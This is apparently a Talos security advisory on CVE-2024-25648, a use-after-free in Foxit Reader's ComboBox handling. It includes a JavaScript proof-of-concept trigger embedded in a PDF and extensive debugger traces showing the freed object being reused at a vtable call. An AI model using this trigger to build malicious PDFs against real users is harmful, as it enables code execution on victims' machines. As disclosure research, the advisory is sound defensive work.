CVE-2024-25648
A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a ComboBox widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a ComboBox object. This can be illustrated by the following proof-of-concept code:
function main() {
app.activeDocs[0].addField('aaaa', "combobox", 2, [13,8,0,19] )
getField('aaaa').setAction("Format",'delete_pages();');
app.activeDocs[0].addField('aaaa', "combobox", 0, [13,8,0,19] ) ;
}
function delete_pages() {
app.activeDocs[0].deletePages();
app.activeDocs[0].deletePages();
}
The above code creates a ComboBox widget and assigns a callback function to its Format event, which is promptly triggered by the second call to addField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a ComboBox object is freed by deletePages() and it is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
eax=00420000 ebx=072fe18c ecx=00420000 edx=155d432c esi=00000004 edi=155f31a0
eip=01750027 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d77:
01750027 8b75d8 mov esi,dword ptr [ebp-28h] ss:002b:072fddd8=12d3c4a0
0:000> g
eax=072fd530 ebx=072fd59c ecx=02904f80 edx=00000002 esi=12ceebd0 edi=12cd8198
eip=02cd56e9 esp=072fd508 ebp=072fd548 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<---------------- (1)
0:000> g
ModLoad: 71380000 716d7000 C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
js call
eax=072fd530 ebx=072fd59c ecx=02904f80 edx=00000002 esi=158d1e10 edi=16417ce0
eip=02cd56e9 esp=072fd508 ebp=072fd548 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<---------------- (2)
0:000> g
eax=072fae40 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad36 esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:
005aad36 8b01 mov eax,dword ptr [ecx] ds:002b:12d3c4a0=0472e794
0:000> dd 12d3c4a0 ;<---------------- (3)
12d3c4a0 0472e794 133185e0 155ec3e0 12d41cc0
12d3c4b0 e0e0e000 00000001 10b9c9e8 01000101
12d3c4c0 00000004 00000000 162d49b0 00000000
12d3c4d0 10b9c944 135b09e0 157ec0d8 00000000
12d3c4e0 00000000 00000000 00000000 00000000
12d3c4f0 00000000 e0e0e000 00000000 00000000
12d3c500 00000000 a0a0a0a0 a0a0a0a0 001b0130
12d3c510 00000000 00000000 96981050 161b0152
0:000> p
eax=0472e794 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad38 esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:
005aad38 6a01 push 1
0:000> p
eax=0472e794 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad3a esp=072fae60 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:
005aad3a ff5004 call dword ptr [eax+4] ds:002b:0472e798=0174e360 ;<---------------- (4)
0:000> p
eax=12d3c4a0 ebx=0c3a0174 ecx=12d3c4a0 edx=00000001 esi=0c3a0170 edi=13151348
eip=005aad3d esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:
005aad3d 83c604 add esi,4
0:000> dd 12d3c4a0 ;<---------------- (5)
12d3c4a0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4b0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4c0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4d0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4e0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4f0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c500 f0f0f0f0 a0a0a0a0 a0a0a0a0 001b0130
12d3c510 00000000 00000000 96981050 161b0152
At [1] and [2] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. The second call to the deletePages_static() method calls the destructor method of the CBF_Widget class at [4]. This destructor call frees the vulnerable CBF_Widget object. The value of the vulnerable CBF_Widget object is examined at [3] and [5]. It shows the value before and after the destructor method is called. The vulnerable CBF_Widget object is a type of ComboBox object, which is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=0175009b esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506deb:
0175009b 8d4dec lea ecx,[ebp-14h]
0:000> p
eax=00000000 ebx=072fe18c ecx=072fddec edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=0175009e esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dee:
0175009e e81d536000 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500a3 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506df3:
017500a3 c745fcffffffff mov dword ptr [ebp-4],0FFFFFFFFh ss:002b:072fddfc=00000000
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500aa esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dfa:
017500aa 8d4d24 lea ecx,[ebp+24h]
0:000> p
eax=00000000 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500ad esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dfd:
017500ad e80e536000 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
0:000> p
eax=155dd518 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b2 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e02:
017500b2 8bc6 mov eax,esi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b4 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e04:
017500b4 8b4df4 mov ecx,dword ptr [ebp-0Ch] ss:002b:072fddf4=072fde40
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde40 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b7 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e07:
017500b7 64890d00000000 mov dword ptr fs:[0],ecx fs:0053:00000000=072fddf4
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde40 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500be esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e0e:
017500be 59 pop ecx
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500bf esp=072fddb0 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e0f:
017500bf 5f pop edi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=12d3c4a0 edi=10bd0640
eip=017500c0 esp=072fddb4 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e10:
017500c0 5e pop esi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c1 esp=072fddb8 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e11:
017500c1 8be5 mov esp,ebp
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c3 esp=072fde00 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e13:
017500c3 5d pop ebp
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c4 esp=072fde04 ebp=072fde4c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e14:
017500c4 c3 ret
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e5ce esp=072fde08 ebp=072fde4c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!CryptUIWizExport+0x3574e:
00d7e5ce 83c420 add esp,20h
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e5d1 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x35751:
00d7e5d1 eb56 jmp FoxitPDFReader!CryptUIWizExport+0x357a9 (00d7e629)
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e629 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357a9:
00d7e629 8bc8 mov ecx,eax
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62b esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357ab:
00d7e62b 85c9 test ecx,ecx
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62d esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357ad:
00d7e62d 742d je FoxitPDFReader!CryptUIWizExport+0x357dc (00d7e65c) [br=0]
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62f esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357af:
00d7e62f 8b01 mov eax,dword ptr [ecx] ds:002b:12d3c4a0=f0f0f0f0 ; <---------------- [6]
0:000> p
eax=f0f0f0f0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e631 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357b1:
00d7e631 8b4044 mov eax,dword ptr [eax+44h] ds:002b:f0f0f134=???????? ; <---------------- [7]
0:000> u
FoxitPDFReader!CryptUIWizExport+0x357b1:
00d7e631 8b4044 mov eax,dword ptr [eax+44h]
00d7e634 ffd0 call eax
00d7e636 8bf0 mov esi,eax
00d7e638 c745fcffffffff mov dword ptr [ebp-4],0FFFFFFFFh
00d7e63f 8d4d24 lea ecx,[ebp+24h]
00d7e642 e8796dfd00 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
00d7e647 8bc6 mov eax,esi
00d7e649 8b4df4 mov ecx,dword ptr [ebp-0Ch]
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fde4c 029aeb05 072fde24 00000000 41500000 FoxitPDFReader!CryptUIWizExport+0x357b1
01 072fdf38 0294f51a 10b70bb0 00000000 00000004 FoxitPDFReader!safe_vsnprintf+0x1213cd5
02 072fe050 02903529 15de8118 072fe118 072fe098 FoxitPDFReader!safe_vsnprintf+0x11b46ea
03 072fe0f0 02cd56eb 15de8118 072fe120 072fe118 FoxitPDFReader!safe_vsnprintf+0x11686f9
04 072fe138 02eb9a6b 12f50ba8 27629525 12f50ba8 FoxitPDFReader!FXJSE_GetClass+0x26b
05 072fe1a0 02eb922e 072fe1e8 27629525 072fe2c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
06 072fe234 02eb94e5 072fe264 12f50ba8 072fe2c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
07 072fe27c 02eb936b 072fe294 00000009 072fe2e0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
08 072fe298 030db17b 00000009 072fe2e0 12f50ba8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
09 072fe2b8 030771d9 37342339 2ed520e5 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0a 072fe310 030771d9 2763eb6d 2ed51ddd 2ed51e31 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0b 072fe33c 03075860 2763eb6d 373421b1 2ed51ddd FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0c 072fe354 03075689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
0d 072fe380 02d11f4e 12f50ba8 37342339 2ed51ddd FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
0e 072fe490 02d11a42 072fe624 12f50ba8 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
0f 072fe518 02cfa744 072fe624 12f50ba8 1daaf41c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
10 072fe6c8 02cfa240 072fe764 1daaf444 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
11 072fe6dc 02cd3c5f 072fe764 1daaf444 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
12 072fe754 02cd4596 1daaf41c 15c858b8 1daaf408 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
13 072fe790 02878af7 10b7d580 154f147c 15c858b8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
14 072fe848 0287a129 00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
15 072fe860 00bb20df 072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
16 072fe890 00bb0fa4 13075cf8 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
17 072fe8d0 00baf9d0 186c9020 10b707f0 12e38c38 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
18 072fe924 0049d322 072fe954 10b707f0 12e38c38 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
19 072fe974 0071901b 00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1a 072ff598 03cb9713 00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1b 072ff668 03cba8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1c 072ff68c 03cb5292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
1d 072ff700 03cb5b05 15d80558 0004094e 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
1e 072ff720 750c120b 0004094e 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
1f 072ff74c 750b81ca 03cb5ad1 0004094e 00000429 USER32!_InternalCallWinProc+0x2b
20 072ff830 750b5f2a 03cb5ad1 00000000 00000429 USER32!UserCallWinProcCheckWow+0x33a
21 072ff8a4 750b5cf0 00000329 072ff8cc 0069f324 USER32!DispatchMessageWorker+0x22a
22 072ff8b0 0069f324 0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
23 072ff8cc 0069f3e3 057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
24 072ff8ec 040e29c2 00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
25 072ff904 03e9cef1 00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
26 072ff950 76ddfcc9 0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
27 072ff960 77247c6e 0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
28 072ff9bc 77247c3e ffffffff 77268c33 00000000 ntdll!__RtlUserThreadStart+0x2f
29 072ff9cc 00000000 03e9cfc0 0710e000 00000000 ntdll!_RtlUserThreadStart+0x1b
At [6] above, we can observe ecx contains the same memory pointer, which belongs to a freed allocation. The value in ecx is dereferenced as if it were an object pointer. This directly leads to a use-after-free condition and results in a crash. Subsequent instructions constitute the usual vtable function call, with the actual function pointer coming from an area pointed to by ecx. This would give an attacker direct control over execution control flow.
Since additional Javascript code can be executed between object free and reuse, freed memory could be put under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.
The vendor has provided updated versions
2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release
Discovered by KPC of Cisco Talos.